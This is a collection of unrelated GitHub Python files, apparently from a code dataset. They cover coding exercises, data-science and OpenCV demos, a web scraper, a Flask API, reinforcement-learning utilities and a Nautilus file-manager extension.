+{"seq_id":"8802060561","text":"from itertools import groupby\nalunos = [\n    {'nome':'Daniel','nota':'A'},\n    {'nome':'luana','nota':'B'},\n    {'nome':'tiago','nota':'B'},\n    {'nome':'gabriel','nota':'B'},\n    {'nome':'joao','nota':'A'},\n    {'nome':'andre','nota':'C'},\n    {'nome':'manuel','nota':'A'},\n    {'nome':'rose','nota':'C'},\n    {'nome':'elaine','nota':'B'},\n    {'nome':'wilson','nota':'B'},\n]\n\nordena = lambda item: item['nota']\nalunos.sort(key=ordena)\nalunos_agrupados = groupby(alunos, ordena)\n\nfor agrupamento, valores_agrupados in alunos_agrupados:\n    print(f' Agrupamento {agrupamento}')\n\n    quantidade = len(list(valores_agrupados))\n    print(f'{quantidade} alunos tiraram a nota {agrupamento}')\n# Agrupamento A\n# 3 alunos tiraram a nota A\n# Agrupamento B\n# 5 alunos tiraram a nota B\n# Agrupamento C\n# 2 alunos tiraram a nota C\n","repo_name":"D-Wolter/Python3-Udemy","sub_path":"pythonProject/03al78Groupby_agrupando_valores/Groupby4.py","file_name":"Groupby4.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"4668886238","text":"import numpy as np\nfrom pymeteo import constants\nfrom .. 
import OptionsWidget\n\nclass curved90(OptionsWidget.OptionsWidget):\n\n def __init__(self):\n super(curved90,self).__init__()\n name = 'curved90 (quartercircle)'\n variables = [ ('z_curve,top', '2000', 'm'),\n ('z_constblo', '0', 'm'),\n ('z_constabv', '6000', 'm'),\n ('u_straight,min', '7.0', 'm/s'),\n ('u_straight,max', '31.0', 'm/s'),\n ('straight,scale', '1.0', ''),\n ('u_adjust' , '0.0', 'm/s'),\n ('v_adjust' , '0.0', 'm/s') ]\n self.initUI(name, variables)\n \n def plot(self):\n # nned z, t, th, p and qv\n z = np.arange(0., 22000., 50.)\n u = np.zeros(len(z))\n v = np.zeros(len(z))\n\n # parameters\n zdep0 = self.getOption('z_constblo')\n zdep1 = self.getOption('z_curve,top')\n zdep2 = self.getOption('z_constabv')\n umax1 = self.getOption('u_straight,min')\n umax2 = self.getOption('u_straight,max')\n sf = self.getOption('straight,scale')\n cx = self.getOption('u_adjust')\n cy = self.getOption('v_adjust')\n\n for k in range(len(z)):\n if (z[k] < zdep0): #constant section\n u[k] = 0\n v[k] = 0\n elif (z[k] < zdep1): # curvature section\n a = ((z[k]-zdep0)/(zdep1-zdep0))*(np.pi/2.)\n u[k] = umax1-umax1*np.cos(a)\n v[k] = umax1*np.sin(a)\n elif (z[k] < zdep2): # straight section\n u[k] = (umax1+(z[k]-zdep1)*(umax2-umax1)/(zdep2-zdep1))\n v[k] = umax1\n u[k] = u[k]* (1 + (sf-1)*((z[k]-zdep1)/(zdep2-zdep1)))\n else: # constant section\n u[k] = umax2*sf\n v[k] = umax1\n\n u[:] = u[:] - cx\n v[:] = v[:] - cy\n\n #emit\n return (z,u,v)\n \n","repo_name":"cwebster2/pyMeteo","sub_path":"pymeteo/cm1/hodographs/curved90.py","file_name":"curved90.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"51"} +{"seq_id":"5342061549","text":"# Learn from a part of the data set (or a specific year) and predict a Trump tweet\n\nfrom cleanup import cleanup_text\nfrom cleanup import cleanup_tweets\nfrom cleanup import cleanup_for_char\nfrom modelling import modelling\nimport numpy as np\nimport pandas as pd\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.utils import np_utils\n\n# ---- For running on GPU ----\n# import tensorflow as tf\n# config = tf.compat.v1.ConfigProto(gpu_options=tf.compat.v1.GPUOptions(\n# per_process_gpu_memory_fraction=0.8)\n# # device_count = {'GPU': 1}\n# )\n# config.gpu_options.allow_growth = True\n# session = tf.compat.v1.Session(config=config)\n# tf.compat.v1.keras.backend.set_session(session)\n# # import tensorflow as tf\n# # GPU_OPTIONS = tf.GPUOptions(allow_growth=True)\n# # CONFIG = tf.ConfigProto(gpu_options=GPU_OPTIONS)\n# # sess = tf.Session(config = CONFIG)\n\n# ----------------------------\n\n# Load data set\ndata = pd.read_csv('data/tweets_11-06-2020.csv')\n\nuser_year = '2020'\ndf = data[(data[\"date\"] >= user_year + '-03-01 00:00:00') &\n (data[\"date\"] <= user_year + '-03-31 23:59:59')]\n\nprint('length df:', len(df))\n\ntweet_list = cleanup_tweets(df)\nprint('length tweet_list:', len(tweet_list))\n\ntext = cleanup_for_char(' '.join(tweet_list))\n# print(text)\n\n# File_object = open(r\"File_Name\", \"Access_Mode\")\n# File_object.write(str1)\n\n# Words\nwords = text.split()\nwords_unique = sorted(list(set(words)))\nprint('length words:', len(words))\nprint('length words_unique:', len(words_unique))\n\n# Creating char mapping\ncharacters = sorted(list(set(text)))\nn_to_char = {n: char for n, char in enumerate(characters)}\nchar_to_n = {char: n for 
n, char in enumerate(characters)}\n# print(characters)\nprint('length unique characters:', len(characters))\n# print('n_to_char: ', n_to_char)\n# print('char_to_n: ', char_to_n)\n\n# Data pre-processing\nX_train = []\nY_target = []\nlength = len(text)\nprint('length text:', length)\nseq_length = 150\n\n\nfor i in range(0, length-seq_length, 1):\n sequence = text[i:i + seq_length]\n label = text[i + seq_length]\n X_train.append([char_to_n[char] for char in sequence])\n Y_target.append(char_to_n[label])\n\nprint('len(X_train):', len(X_train))\n\n# We need to transform the array Y into a one-hot encoded format.\nX_modified = np.reshape(X_train, (len(X_train), seq_length, 1))\nX_modified = X_modified / float(len(characters))\nY_modified = np_utils.to_categorical(Y_target)\n\nrun_model_fit = False\n\n[model, filename] = modelling(X_modified, Y_modified, run_model_fit)\n\nif filename != '':\n model.load_weights(filename)\n# else:\n# model.load_weights(\n# 'models/text_generator_gigant_700_0.2_700_0.2_700_0.2_201.h5')\n\n\nstring_mapped = [0] # X_train[99]\nprint(string_mapped)\n\nfull_string = [n_to_char[value] for value in string_mapped]\n# full_string = ['i']\nprint(full_string)\n\n# generating characters\nfor i in range(140):\n x = np.reshape(string_mapped, (1, len(string_mapped), 1))\n x = x / float(len(characters))\n\n pred_index = np.argmax(model.predict(x, verbose=0))\n seq = [n_to_char[value] for value in string_mapped]\n full_string.append(n_to_char[pred_index])\n\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\n# combining text\ntxt = \"\"\nfor char in full_string:\n txt = txt + char\nprint('txt:', txt)\n","repo_name":"jacobmolin/Trump_Tweet_Generator","sub_path":"predict_by_char.py","file_name":"predict_by_char.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20886021990","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# read\nimg = cv.imread('box.jpg', cv.IMREAD_COLOR)\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\nimg = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n\n# threshold\nret, thresh = cv.threshold(gray, 127, 255, 0)\n\n# find contours\n# https://docs.opencv.org/master/d4/d73/tutorial_py_contours_begin.html\n# document has error\n# findContours had not changed source img and plus one return value at first\nsome, contours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\n# draw all contours\ngreen = img.copy()\ncv.drawContours(green, contours, -1, (0, 255, 0), 3)\n\n# draw first contours\nred = img.copy()\ncv.drawContours(red, contours, 0, (255, 0, 0), 3)\n\n# show\nplt.subplot(2, 2, 1), plt.imshow(img, \"gray\")\nplt.subplot(2, 2, 2), plt.imshow(green, \"gray\")\nplt.subplot(2, 2, 3), plt.imshow(red, \"gray\")\nplt.show()\n","repo_name":"AlanLi7991/opencv-turtorial-notes","sub_path":"04-image/09-contours-start.py","file_name":"09-contours-start.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"11601325668","text":"import ez\nimport webbrowser\n\nsubtask_score=[]\nsubtask_case=[]\nsubtask_cnt=0\ncase_cnt=0\ntask_id=0\n\nf=open(\"j2.txt\",\"r\")\n# task_id=input(\"task_id = \")\ntask_id=f.readline().rstrip()\nprint (\"Task\",task_id)\n\ndef from_j2():\n\tglobal subtask_score,subtask_case,subtask_cnt\n\n\t# subtask_string=input(\"Distribution of subtask in J2 = 
\")\n\tsubtask_string=f.readline().rstrip()\n\tsubtask_split=subtask_string.split(\",\")\n\n\t# for i in subtask_split:\n\t# \tprint (i)\n\n\tsubtask_cnt=int(subtask_split[0])\n\tfor i in range(1,len(subtask_split),2):\n\t\t# print (subtask_split[i],subtask_split[i+1])\n\t\tsubtask_score.append(int(subtask_split[i]))\n\t\tsubtask_case.append(int(subtask_split[i+1]))\n\n\tglobal case_cnt\n\tfor i in subtask_case:\n\t\tcase_cnt+=i\n\tprint (\"Number of Cases:\",case_cnt)\n\ndef to_j8():\n\t#focus on the chrome window\n\tez.mouse.move(1523,714)\n\tez.mouse.click()\n\tez.time.sleep(0.5)\n\n\tez.keyboard.send(\"ctrl+t\")\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\tez.keyboard.write(\"http://210.176.23.169:3000/edit-task/\" + task_id + \"/edit-data\")\n\n\t# print(\"http://210.176.23.169:3000/edit-task/\" + task_id + \"/edit-data\")\n\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(8)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\t#switch on subtask button\n\tfor i in range(0,12):\n\t\tez.keyboard.send(\"tab\")\n\t\tez.time.sleep(0.0001)\n\tfor i in range(0,case_cnt*3):\n\t\tez.keyboard.send(\"tab\")\n\t\tez.time.sleep(0.0001)\n\n\tez.time.sleep(2)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\tez.keyboard.send(\"space\")\n\n\t#move to the add subtask button\n\tfor i in range(0,5):\n\t\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\t# add subtask\n\tfor i in range(0,subtask_cnt-1):\n\t\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t#input subtask information\n\tfor i in range(0,subtask_cnt*4):\n\t\tez.keyboard.send(\"shift+tab\")\n\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\tpartial_sum=0\n\tfor i in range(0,subtask_cnt):\n\t\tez.keyboard.write(str(subtask_score[i]))\n\t\tez.keyboard.send(\"tab\")\n\t\tez.keyboard.send(\"tab\")\n\t\t\n\t\tez.keyboard.write(str(partial_sum) + \"-\" + str(partial_sum+subtask_case[i]-1))\n\t\tpartial_sum+=subtask_case[i]\n\n\t\tez.keyboard.send(\"tab\")\n\t\tez.keyboard.send(\"tab\")\n\n\t#save\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\t#open statement window\n\tez.mouse.move(526,1708)\n\tez.mouse.click()\n\tez.time.sleep(0.5)\n\n\tez.keyboard.send(\"ctrl+t\")\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\n\tez.keyboard.write(\"http://210.176.23.169:3000/task/\" + task_id)\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\tez.keyboard.write(\"http://210.176.23.169:3000/task/\" + task_id + \"#output\")\n\tez.keyboard.send(\"enter\")\n\n\t#move back to the first depend\n\tez.mouse.move(265,725)\n\tez.mouse.click()\n\n\tfor i in range(0,subtask_cnt*4):\n\t\tez.keyboard.send(\"shift+tab\")\n\tez.keyboard.send(\"tab\")\n\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\nfrom_j2()\nto_j8()\n\n# ez.mouse.drag(684,14, 684,1050, absolute=True,duration=0.25)\n# ez.mouse.double_click()","repo_name":"EagleZhen/Scripts","sub_path":"荒废/J8 transfer subtask/J8 transfer subtask.py","file_name":"J8 transfer subtask.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"7366453331","text":"from .blocks import Block\nfrom .renderers import BarRenderer, 
BlocksRenderer\nfrom .containers import Container\nfrom inspect import isclass\nfrom threading import Event\nfrom typing import List\n\nimport sys\n\n\nclass Scheduler(object):\n def __init__(self, stdout=sys.stdout, stderr=sys.stderr):\n self.event = Event()\n self.running = False\n self.stdout = stdout\n self.stderr = stderr\n\n def start(self, bar_renderer: BarRenderer):\n self.running = True\n while self.running:\n self.run(bar_renderer)\n self.sleep()\n\n def run(self, bar_renderer: BarRenderer):\n try:\n self.stdout.write(bar_renderer.render())\n except Exception as e:\n self.stderr.write(str(e))\n self.stderr.flush()\n self.stdout.write('\\n')\n self.stdout.flush()\n\n def sleep(self):\n self.event.wait(1)\n self.event.clear()\n\n\nclass BlocksConverter(object):\n def __init__(self, container: Container, separator=' '):\n self.container = container\n self.separator = separator\n\n def to_renderer(self, blocks: List) -> BlocksRenderer:\n blocks = self.delegate_blocks(blocks)\n return BlocksRenderer(blocks, self.separator)\n\n def delegate_blocks(self, blocks: List) -> List[Block]:\n return [self.delegate_block(block) for block in blocks]\n\n def delegate_block(self, block) -> Block:\n if isclass(block):\n if hasattr(block, '__injected__'):\n block = block(self.container)\n else:\n block = block()\n if callable(block):\n return Block(renderer=block)\n if isinstance(block, Block):\n return block\n raise TypeError('Unknown block type %s' % type(block))\n\n\n__all__ = [\n 'Block', 'BlocksRenderer', 'BarRenderer', 'Scheduler',\n 'delegate_blocks', 'delegate_block'\n]\n","repo_name":"frizz925/dotfiles-old","sub_path":".lemonbar/i3lemonbar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4589735757","text":"import scrapy\nfrom copy import deepcopy\nfrom scrapy_splash import SplashRequest\n\n\nclass JdSpider(scrapy.Spider):\n name = 'jd'\n allowed_domains = ['jd.com']\n start_urls = ['https://pjapi.jd.com/book/sort?source=bookSort']\n headers = {\n 'Referer': 'https://book.jd.com/booksort.html'\n }\n lua_scripts = \"\"\"\n function main(splash)\n splash:go(splash.args.url)\n splash:wait(1)\n splash:runjs(\"document.getElementsByClassName('page clearfix')[0].scrollIntoView(true)\")\n splash:wait(1)\n return splash:html()\n end\n \"\"\"\n\n def start_requests(self):\n\n yield scrapy.Request(self.start_urls[0], headers=self.headers)\n\n def parse(self, response):\n html = response.body.decode()\n data = eval(html)\n item = {}\n # print(data)\n for i in data['data']:\n item['f_cate_id'] = str(int(i['fatherCategoryId']))\n item['cate_id'] = str(int(i['categoryId']))\n item['cate_name'] = i['categoryName']\n for i1 in i['sonList']:\n item['s_cate_id'] = str(int(i1['categoryId']))\n item['s_cate_name'] = i1['categoryName']\n item['s_cate_cat'] = 'https://list.jd.com/list.html?cat=' + \",\".join(\n [str(int(i['fatherCategoryId'])), str(int(i['categoryId'])), str(int(i1['categoryId']))])\n yield SplashRequest(item['s_cate_cat'],\n callback=self.parse_book_list,\n endpoint='execute',\n args={\"lua_source\": self.lua_scripts},\n # cache_args=['lua_source'],\n headers=self.headers,\n meta={'item': deepcopy(item)}\n )\n\n def parse_book_list(self, response):\n item = response.meta['item']\n div_list = response.xpath('//div[@class=\"gl-i-wrap\"]')\n for div in div_list:\n item['book_info'] = {\n 'name': 
div.xpath('./div[@class=\"p-name\"]/a/em/text()').extract_first(),\n 'introduction': div.xpath('./div[@class=\"p-name\"]/a/i/text()').extract_first(),\n 'author': div.xpath('./div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-name\"]/a/text()').extract_first(),\n 'price': ''.join(div.xpath('./div[@class=\"p-price\"]/strong//text()').extract()).strip(),\n 'publisher': div.xpath(\n './div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-store\"]/a/text()').extract_first(),\n 'publish_date': div.xpath(\n './div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-date\"]/text()').extract_first(),\n # 'book_img': 'https' + div.xpath('./div[@class=\"p-img\"]/a/img/@src').extact_first(),\n 'book_url': div.xpath('./div[@class=\"p-name\"]/a/@href').extract_first()\n }\n print(item)\n # yield item\n\n # for page in range(2, 101):\n # url = response.url + '&page={}'.format(page)\n # yield scrapy.Request(url, callback=self.parse_book_list, headers=self.headers)\n","repo_name":"Jonescy/few-spiders","sub_path":"JDBooks/JDBooks/spiders/jd.py","file_name":"jd.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"43144475409","text":"A = int(input(\"첫 번째 수를 입력하세요 : \"))\nB = int(input(\"두 번째 수를 입력하세요 : \"))\n\ndef gcd (a, b):\n if a < b:\n (a, b) = (b, a)\n while b != 0:\n r = a % b\n a = b\n b = r\n return a\n\ndef gab (a, b):\n return a*b/gcd(a,b)\n\nprint (\"두 수의 최대공약수는 {}입니다.\" .format(gcd(A, B)))\nprint (\"두 수의 최소공배수는 {}입니다.\" .format(gab(A, B)))\n","repo_name":"codedu-python/produce","sub_path":"최대공약수 최소공배수 - 조윤진.py","file_name":"최대공약수 최소공배수 - 조윤진.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34239198134","text":"rock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n# Main code below this line 👇\nimport random\ngame_picture = [rock, paper, scissors]\nuser_choice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors. \"))\nif user_choice >= 3 or user_choice < 0:\n print(\"YOU TYPED A WRONG NUMBER. 
YOU LOOSE\")\nelse:\n print(\"You choose\")\n print(game_picture[user_choice])\n \n computer_choice = random.randint(0, 2)\n print(f\"Computer chooses:\")\n print(game_picture[computer_choice])\n\n if user_choice == 0 and computer_choice == 2:\n print(\"YOU WIN\")\n elif computer_choice == 0 and user_choice == 2:\n print(\"YOU LOOSE\")\n elif computer_choice > user_choice:\n print(\"YOU LOOSE\")\n elif user_choice > computer_choice:\n print(\"YOU WIN\")\n elif computer_choice == user_choice:\n print(\"IT'S A DRAW\")\n","repo_name":"Hemant-Gurjar/Rock-Paper-Scissors-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"34683013279","text":"from flask import Flask\nfrom flask_smorest import Api\nfrom dotenv import load_dotenv\nfrom flask_migrate import Migrate\nimport os\n\nfrom .person import blp as PersonBlueprint\nfrom .db import db\n\n\ndef create_app(db_url=None):\n\n app = Flask(__name__)\n load_dotenv()\n\n app.config[\"PROPAGATE_EXCEPTIONS\"] = True\n app.config[\"API_TITLE\"] = \"Person CRUD REST API\"\n app.config[\"API_VERSION\"] = \"v1\"\n app.config[\"OPENAPI_VERSION\"] = \"3.0.3\"\n app.config[\"OPENAPI_URL_PREFIX\"] = \"/\"\n app.config[\"OPENAPI_SWAGGER_UI_PATH\"] = \"/swagger-ui\"\n app.config[\"OPENAPI_SWAGGER_UI_URL\"] = \"https://cdn.jsdelivr.net/npm/swagger-ui-dist/\"\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n db.init_app(app)\n api = Api(app)\n migrate = Migrate(app, db)\n\n api.register_blueprint(PersonBlueprint)\n\n return app\n","repo_name":"iamprecieee/HNGx-person-crud-api","sub_path":"resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40437697958","text":"product_prices = [1200, 5000, 4500, 7300, 3000, 2100]\ncovid_cases = [231, 776, 331, 897, 554, 131]\nipl_team_scores = [12, 5, 8, 7, 3, 9]\n\n\ndef get_max(data):\n max = data[0]\n for idx in range(1, len(data)):\n if data[idx] > max:\n max = data[idx]\n\n print(\"Max is:\", max)\n return max\n\n\"\"\"\nmax = product_prices[0]\nfor idx in range(1, len(product_prices)):\n if product_prices[idx] > max:\n max = product_prices[idx]\n\nprint(\"Max in product_prices is:\", max)\n\nmax = covid_cases[0]\nfor idx in range(1, len(covid_cases)):\n if covid_cases[idx] > max:\n max = covid_cases[idx]\n\nprint(\"Max in covid_cases is:\", max)\n\nmax = ipl_team_scores[0]\nfor idx in range(1, len(ipl_team_scores)):\n if ipl_team_scores[idx] > max:\n max = ipl_team_scores[idx]\n\nprint(\"Max in ipl_team_scores is:\", max)\n\"\"\"\nresult = get_max(product_prices)\nprint(\"Max in product_prices is:\", result)\nprint(\"Max in covid_cases is:\", get_max(covid_cases))\nprint(\"Max in ipl_team_scores is:\", get_max(ipl_team_scores))\n","repo_name":"ishantk/GW2022PD1","sub_path":"Session4C.py","file_name":"Session4C.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"1619222486","text":"import ray\nimport itertools\nimport torch\nimport config\n\n\n\ndef process_state_f(observation):\n (obs, rewards, dones, collisions, info) = observation\n x = obs[0][0]\n y = obs[0][1]\n x1 = torch.tensor(x)\n y1 = torch.tensor(y)\n #new_obs = {agent_id: \\\n #(o[0], 
o[1]) for agent_id, o in obs.items()}\n new_obs = {agent_id: \\\n ( torch.tensor(o[0]).reshape((1,-1)).to(config.device), torch.tensor(o[1]).reshape((1,-1)).to(config.device) ) for agent_id, o in obs.items()}\n\n return new_obs\n\ndef s_a_adv_minibatch(policy, traj_list,gamma, lambda_, seperate_agents = False):# NB: TEST\n \"\"\"traj_list; a list of (sarst, values, logging_info) tuples\n seperate_agents: Whether or not to append trajectories from\n different agents in the same environmnet. If homogeneous agents, \n it can be appended\"\"\"\n states_p1 = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n states_p2 = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n actions = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n advantages = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n\n for trajectory in traj_list:\n (svarst, logging_info) = trajectory\n for agent_id, hldr in svarst.items():\n adv = None\n for i, (s, v, a, r, s_n, t) in enumerate(reversed(hldr)):\n if i == 0:\n if t:\n adv = r - v.item()\n else:\n a_prob,v_next = policy(*s_n)\n adv = r + gamma * v_next.item() - v.item()\n else:\n if t: \n adv = r - v.item()\n else:\n adv = r + gamma * lambda_ * adv - v.item()\n states_p1[agent_id].append(s[0])\n states_p2[agent_id].append(s[1])\n actions[agent_id].append(a)\n advantages[agent_id].append(adv)\n if seperate_agents != True:\n states_p1 = list(itertools.chain.from_iterable(states_p1.values()))\n states_p2 = list(itertools.chain.from_iterable(states_p2.values()))\n actions = list(itertools.chain.from_iterable(actions.values()))\n advantages = list(itertools.chain.from_iterable(advantages.values()))\n\n states_p1 = torch.cat(states_p1, dim=0)\n states_p2 = torch.cat(states_p2, dim=0)\n actions = torch.cat(actions, dim = 0)\n advantages = torch.tensor(advantages).reshape((-1,1))\n\n else:\n for agent_id, s in states_p1.items():\n states_p1[agent_id] = torch.cat(s, dim = 0)\n for agent_id, s in states_p2.items():\n states_p2[agent_id] = torch.cat(s, dim = 0)\n for agent_id, a in actions.items():\n actions[agent_id] = torch.cat(a, dim = 0)\n for agent_id, adv in advantages.items():\n advantages[agent_id] = torch.tensor(adv).reshape((-1,1))\n \n return (states_p1, states_p2), actions, advantages\n\n\n \n\n\n\n#@ray.remote(num_cpus = 1, num_gpus=0.1)\nclass env_inst():\n def __init__(self, env, n_step, process_state_f):\n self.env = env\n self.n_step = n_step\n self.obs_next = None\n self.process_state = process_state_f\n\n def get_env(self):\n return self.env\n\n def rollout(self,policy):\n svarst = {agent_id:[] for agent_id in self.env.agents.keys()} #State, action, reward, ter\n values = {agent_id:[] for agent_id in self.env.agents.keys()} #State values list\n logging_info = []\n if self.obs_next == None:\n obs = self.env.reset()\n else:\n obs = self.obs_next\n \n for i in range(self.n_step):\n o = self.process_state(obs)\n a ={}\n for agent_id in self.env.agents.keys():\n a_prob, v = policy.forward(*o[agent_id])\n a[agent_id] = policy.get_action(a_prob)\n values[agent_id] = v\n\n \n\n self.obs_next = self.env.step(a)\n\n o_next = self.process_state(self.obs_next)\n\n for agent_id in self.env.agents.keys():\n svarst[agent_id].append((o[agent_id], v, a[agent_id], self.obs_next[1][agent_id], o_next[agent_id], self.obs_next[-1][\"terminate\"]))\n\n if svarst[0][-1][-1]:\n obs = self.env.reset()\n logging_info.append(self.obs_next[-1])\n else:\n obs = self.obs_next\n return (svarst, logging_info)\n \n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n trans = []\n 
#np.random.seed(1)\n for i in range(t):\n if self.global_T == 0:\n self.env.seed(sdr.get())\n self.this_state = torch.tensor([self.env.reset()], dtype=torch.float)\n \n \n\n _, a_prob = policy.forward(self.this_state)\n a = policy.get_action(a_prob).squeeze().item()\n\n #a = np.random.choice([0,1])\n\n s_next,r,ter,_ = self.env.step(a)\n s_next = torch.tensor([s_next], dtype=torch.float)\n self.r_log_hldr.append(r)\n trans.append(sar(self.this_state, a, r, s_next,a_prob.squeeze()[a].item(), ter))\n\n self.global_T += 1\n self.this_state = s_next\n\n if ter:\n self.global_T = 0\n self.r_log = self.r_log_hldr[:]\n self.r_log_hldr = []\n return trans\n return trans","repo_name":"Jamesellis51015/Multi-Agent-Path-Finding-with-Reinforcement-Learning","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"19359089297","text":"# 3: Primality Test: Implement three primality test \n# functions using the two following approaches:\n\nimport math\n\n# 3.1: Trial division: For an input n, check if there is a prime number between 2 \n# and √n that divides n\ndef trial(n):\n\n\ta = 2\n\tb = math.ceil(math.sqrt(n))\n\n\twhile a < b:\n\t\tif (n%a == 0):\n\t\t\ta = b + 1\n\t\telse:\n\t\t\ta = a + 1\n\n\tif a == b:\n\t\tprint(n, \"is a prime number \\n\")\n\telse:\n\t\tprint(n, \"is not prime \\n\") \n\ntrial(8)\ntrial(827)\ntrial(83)\n\n\n# 3.2: Using Sieve of Eratosthenes.\ndef eratosthenes(n):\n\n\ta = 2\n\tmyList = []\n\n\twhile(a <= n):\n\t\tmyList.append(a)\n\t\ta = a + 1\n\n\tc = 2\n\td = 3\n\twhile (c < a):\n\t\t\n\t\twhile(d < a):\n\t\t\tif (d%c == 0) and d in myList:\n\t\t\t\tmyList.remove(d)\n\t\t\td = d + 1\n\n\t\tc = c + 1\n\t\td = c + 1\n\n\t\ti = 0\n\twhile i < len(myList):\n\t\tif n%myList[i] == 0 and n != myList[i]:\n\t\t\tprint(n, \"is not prime\")\n\t\t\ti = len(myList) + 1\n\t\telse:\n\t\t\ti = i + 1\n\n\tif i == len(myList):\n\t\tprint(n, \"is prime\")\n\neratosthenes(5)\neratosthenes(20)\neratosthenes(37)\n\n# 3.3: Fermat little theorem BONUS.\n#def flt()\n\n\n\n","repo_name":"honganndo/python-prime-project","sub_path":"DS_3primality.py","file_name":"DS_3primality.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32139892540","text":"from gi import require_version\nrequire_version('Gtk', '3.0')\nrequire_version('Nautilus', '3.0')\nfrom gi.repository import Nautilus, GObject\nfrom subprocess import call\nimport os\n\n# path to vscode\nPHPSTORM = '/opt/PhpStorm-212.5284.49/bin/phpstorm.sh'\n\n# what name do you want to see in the context menu?\nDISPLAYNAME = 'PhpStorm'\n\n# always create new window?\nNEWWINDOW = False\n\n\nclass PhpStormExtension(GObject.GObject, Nautilus.MenuProvider):\n\n def launch_phpstorm(self, menu, files):\n safepaths = '' \n\n for file in files:\n filepath = file.get_location().get_path()\n safepaths += '\"' + filepath + '\" '\n\n # If one of the files we are trying to open is a folder\n # create a new instance of vscode\n # if os.path.isdir(filepath) and os.path.exists(filepath):\n # args = '--new-window '\n\n # if NEWWINDOW:\n # args = '--new-window '\n\n call(PHPSTORM + ' ' + safepaths + '&', shell=True)\n\n def get_file_items(self, window, files):\n item = Nautilus.MenuItem(\n name='PhpStormOpen',\n label='Open in ' + DISPLAYNAME,\n tip='Opens the selected files with PhpStorm'\n )\n item.connect('activate', 
